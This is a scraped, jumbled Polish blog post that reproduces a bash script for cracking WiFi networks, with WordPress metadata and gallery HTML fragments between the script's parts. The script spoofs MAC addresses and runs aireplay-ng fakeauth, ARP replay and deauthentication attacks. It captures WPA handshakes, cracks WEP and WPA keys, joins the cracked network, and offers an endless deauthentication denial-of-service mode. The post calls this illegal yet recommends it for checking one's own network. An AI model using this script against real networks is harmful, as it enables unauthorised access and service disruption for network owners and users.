fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0007.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info 